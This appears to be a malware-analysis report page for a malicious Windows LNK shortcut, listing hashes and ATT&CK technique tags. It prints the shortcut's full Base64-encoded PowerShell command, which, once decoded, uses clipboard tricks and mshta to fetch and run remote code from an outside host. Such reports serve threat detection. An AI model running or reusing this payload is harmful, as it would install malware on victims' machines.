Malicious
Malicious

75f59f9c03b721915c2239610c1b5272

LNK File
|
MD5: 75f59f9c03b721915c2239610c1b5272
|
Size: 2.63 KB
|
application/x-ms-shortcut

LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Print
General
Structural Analysis
Config.0
Yara Rules2
Sync
Community
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
75f59f9c03b721915c2239610c1b5272
Sha1
f82a63e52de3bfa5b1016e65871293e394357d8b
Sha256
49fcf9080afcb05987918952b9cbdcaf3bdfb369928d6372ca73f3a8e4b54f6f
Sha384
6b974ea8ec49f3338799ec8606d4b8208d05c16276793b3fd5b0d2c1bd65f76d29af7e3ebdaecb4609fa530acf4b6ad4
Sha512
ef8595a030efb9391384f1042ec2c4b89e0e1b3edb63a8716de1a7e6edc73029e22799037951d098fc82e0a3b6e6022fda70af24ff90e32af84e8db6a11b8e57
SSDeep
24:8Ayw/BHYVKVWf+/CW+RO0OaTfHgcU0IMJm0sHCEJMdd79dsrab7Z:8y5aXRTt0cU0IMJUiuMdJ9AaZ
TLSH
2151C3281AF502EAF677CBB9A7F973B24876FB96CD2546BC008023411622510B467E7A
File Structure
75f59f9c03b721915c2239610c1b5272
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
LNK CommandLine
PowerShell
Batch Command
PowerShell Call
Contains Base64 Block
Base64 Block
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
DeObfuscated
Contains Base64 Block
Base64 Block
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
[Base64-Block]
Base64 Block
[Lnk Summary]
Malicious
Artefacts
Name
 Value
LNK: Command Execution

powershell.exe powershell -E cwBjAGIAIAAnAG0AcwBeAF4AXgBeAGgAXgBeAF4AdABhACAAXgBeAF4AXgBoAHQAXgBeAF4AdABeAF4AXgBwAF4AXgBeAF4AcwBeADoAXgBeAF4AXgAvAF4AXgBeAC8AdwB3AF4AXgBeAHcALgBmAF4AXgBeAF4AcgBeAF4AbwBeAF4AbgBeAHQAaQBeAF4AXgBeAGUAcgBeAF4AXgAuAF4AXgBeAG4AXgBeAGUAXgBeAF4AdABeAC4AcABrAC8AXgBSAF4AXgBeAGUAZABeAC4AXgBeAG0AXgBeAF4AXgBwADQAJwAuAHIAZQBwAGwAYQBjAGUAKAAnAF4AJwAsACcAJwApADsAaQBlAHgAIAAoAGcAYwBiACkA
Deobfuscated PowerShell

-e "cwBjAGIAIAAnAG0AcwBeAF4AXgBeAGgAXgBeAF4AdABhACAAXgBeAF4AXgBoAHQAXgBeAF4AdABeAF4AXgBwAF4AXgBeAF4AcwBeADoAXgBeAF4AXgAvAF4AXgBeAC8AdwB3AF4AXgBeAHcALgBmAF4AXgBeAF4AcgBeAF4AbwBeAF4AbgBeAHQAaQBeAF4AXgBeAGUAcgBeAF4AXgAuAF4AXgBeAG4AXgBeAGUAXgBeAF4AdABeAC4AcABrAC8AXgBSAF4AXgBeAGUAZABeAC4AXgBeAG0AXgBeAF4AXgBwADQAJwAuAHIAZQBwAGwAYQBjAGUAKAAnAF4AJwAsACcAJwApADsAaQBlAHgAIAAoAGcAYwBiACkA"
75f59f9c03b721915c2239610c1b5272 (2.63 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙